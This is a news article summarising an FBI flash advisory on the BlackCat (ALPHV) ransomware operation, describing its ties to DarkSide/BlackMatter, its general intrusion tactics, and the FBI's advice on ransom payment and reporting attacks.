The Federal Bureau of Investigation (FBI) has given a TLP: WHITE flash notification regarding the BlackCat ransomware-as-a-service (RaaS) operation. BlackCat, also called ALPHAV, which began in November 2021. It was released immediately after the shutdown of the BlackMatter ransomware operation, recognized as a rebrand of DarkSide. Darkside was responsible for the ransomware attack that affected the Colonial Pipeline. Someone from the operation has stated they are formerly an affiliate of BlackMatter/DarkSide that stepped out on their own. Nevertheless, it is very likely that BlackCat is just a rebrand of BlackMatter/DarkSide.
The FBI stated a lot of developers and money launderers associated with the BlackCat operation were connected to DarkSide/BlackMatter, which reveals they have considerable networks and lots of knowledge working with RaaS operations. The BlackCat RaaS operation has not been operating for long, yet the group has already had a minimum of 60 victims globally. BlackCat usually targets large businesses and demands ransom payments of several million dollars in Monero or Bitcoin, though the group seems prepared to talk about payments with victims.
Atypically for ransomware, it is created in RUST, which is regarded to be a safer programming language that assures better functionality and concurrent processing. Preliminary access to networks is typically acquired utilizing formerly compromised credentials, and when access is obtained, Active Directory users, as well as administrator accounts, are impacted. The ransomware executable is very customizable and permits attacks on a broad array of corporate conditions, it allows encryption techniques, and can turn off security functions on victim systems.
The group utilizes Windows Task Scheduler to set up malicious Group Policy Objects (GPOs) to infect with the ransomware, at first utilizing PowerShell scripts and Cobalt Strike. Microsoft Sysinternals Tools and Windows administrative tools are likewise employed during compromise. Prior to encrypting files, victim information is stolen, including those from cloud service providers. Threats are subsequently issued to post the stolen information on the leak website in case there is no ransom payment. In the flash advisory, the FBI has given indicators of compromise (IoCs) and mitigation steps that ought to be followed to enhance security and make it more difficult for attacks to be successful.
Just like all ransomware attacks, the FBI does not advise paying the ransom because there is no assurance that files will be restored, payment does not prevent more attacks, and there’s no guarantee that any records stolen in the attack will not be publicized, stolen, or misused. Nonetheless, the FBI believes that payment of the ransom may be the only alternative in a number of cases to secure customers, patients, workers, and shareholders.
No matter whether or not ransom payment is given, the FBI has asked victims to report attacks to their area FBI field office. The FBI has requested IP logs that show callbacks from IP addresses outside the country, Bitcoin or Monero addresses and transaction IDs, conversations with the ransomware group, the decryptor file, and/or a benign sample of an encrypted document.